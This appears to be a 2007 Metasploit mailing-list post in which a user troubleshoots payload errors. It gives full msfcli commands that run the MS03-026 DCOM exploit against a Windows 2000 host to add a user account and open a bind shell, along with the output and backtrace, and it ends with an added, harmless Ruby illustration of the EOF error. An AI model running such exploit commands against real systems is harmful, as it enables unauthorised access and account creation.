Metasploit mailing list archives

Re: windows/exec Payload problems.


From: a10n3.s7r1k3r at gmail.com (Kashif Iftikhar)
Date: Wed, 24 Jan 2007 13:49:20 +0000

Here is some additional info.

I get the same error when I use the payload windows/adduser, but the
user gets added even after getting the error.

Also, if I terminate the windows session by typing "exit" in windows
shell, I seem to be able to exploit the same box again in MSF3. So the
repeated exploiting problem is resolved but the payload issue still
remains.

Here is the sample output.

***********************************************************************************
root at S7R1K3R:/pentest/exploits/framework-3.0-beta-3$ ./msfcli
"exploit/windows/dcerpc/ms03_026_dcom" PAYLOAD="windows/adduser"
RHOST="192.168.0.17" USER="kkj1" PASS="kkj1" E
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0 at ncacn_ip_tcp:192.168.0.17[135]
...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0 at ncacn_ip_tcp:192.168.0.17[135]
...
[*] Sending exploit ...
Exploit failed: end of file reached
Backtrace:
./lib/rex/io/stream.rb:58:in `sysread'
./lib/rex/io/stream.rb:58:in `read'
./lib/rex/io/stream.rb:181:in `get_once'
./lib/rex/proto/dcerpc/client.rb:150:in `read'
./lib/rex/proto/dcerpc/client.rb:230:in `call'
./lib/msf/core/exploit/dcerpc.rb:97:in `dcerpc_call'
/pentest/exploits/framework-3.0-beta-3/modules/exploits/windows/dcerpc/ms03_026_dcom.rb:206:in `exploit'
./lib/msf/core/exploit_driver.rb:189:in `job_run_proc'
./lib/msf/core/exploit_driver.rb:152:in `run'
./lib/msf/base/simple/exploit.rb:118:in `exploit_simple'
./lib/msf/base/simple/exploit.rb:127:in `exploit_simple'
./msfcli:153

root at S7R1K3R:/pentest/exploits/framework-3.0-beta-3$ ./msfcli
"exploit/windows/dcerpc/ms03_026_dcom"
PAYLOAD="windows/shell/bind_tcp" RHOST="192.168.0.17" E
[*] Started bind handler
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0 at ncacn_ip_tcp:192.168.0.17[135]
...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0 at ncacn_ip_tcp:192.168.0.17[135]
...
[*] Sending exploit ...
[*] Sending stage (474 bytes)
[*] The DCERPC service did not reply to our request
[*] Command shell session 1 opened (192.168.0.21:41500 -> 192.168.0.17:4444)

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.

C:\WINNT\system32>net user
net user

User accounts for \\

-------------------------------------------------------------------------------
Administrator            Guest                    IUSR_COMPULIFE
IWAM_COMPULIFE           kkj                      kkj1
The command completed with one or more errors.


C:\WINNT\system32>exit
exit

Abort session 1? [y/N]  y
********************************************************************************
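The backtrace above ends in Rex::IO::Stream#sysread raising "end of file reached": the exploit request was written, the RPC endpoint went away (the payload had already run, as the added account and the bind shell show), and the read of the reply hit a closed connection. The following Ruby is an added illustration of that failure mode, not code from the post or from the Metasploit framework. The function and message names are hypothetical, the "service" is a constructed in-process peer on a UNIX socket pair, and the point is only to show that a peer closing without answering surfaces as EOFError, which a caller can treat as "no reply" instead of an exploit failure.

```ruby
require 'socket'

# Hypothetical stand-in for a DCERPC call: write the request, then read the
# reply with sysread, which is what raises EOFError ("end of file reached")
# when the peer has closed the connection without answering.
# Returns [:reply, data] when a reply arrives and [:no_reply, nil] on EOF.
def rpc_call(sock, request)
  sock.write(request)
  data = sock.sysread(4096)
  [:reply, data]
rescue EOFError
  # The service is gone; the request (and any payload it carried) was
  # already delivered, so report "no reply" rather than a hard failure.
  [:no_reply, nil]
end

# Constructed peer that behaves: consumes the request and answers it.
def simulate_healthy_service
  client, server = UNIXSocket.pair
  Thread.new do
    server.read(5)        # consume the 5-byte request
    server.write("ack")   # send a reply
    server.close
  end
  rpc_call(client, "hello")
ensure
  client&.close
end

# Constructed peer that mimics the post's adduser run: it reads the request
# and then closes the socket without replying, as a crashed service would.
def simulate_crashed_service
  client, server = UNIXSocket.pair
  Thread.new do
    server.read(5)        # consume the request
    server.close          # go away without a reply
  end
  rpc_call(client, "hello")
ensure
  client&.close
end

if __FILE__ == $PROGRAM_NAME
  p simulate_healthy_service   # [:reply, "ack"]
  p simulate_crashed_service   # [:no_reply, nil]
end
```

Run it with a stock Ruby on a platform that provides UNIXSocket.pair (Linux, BSD, macOS); no network access is needed.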


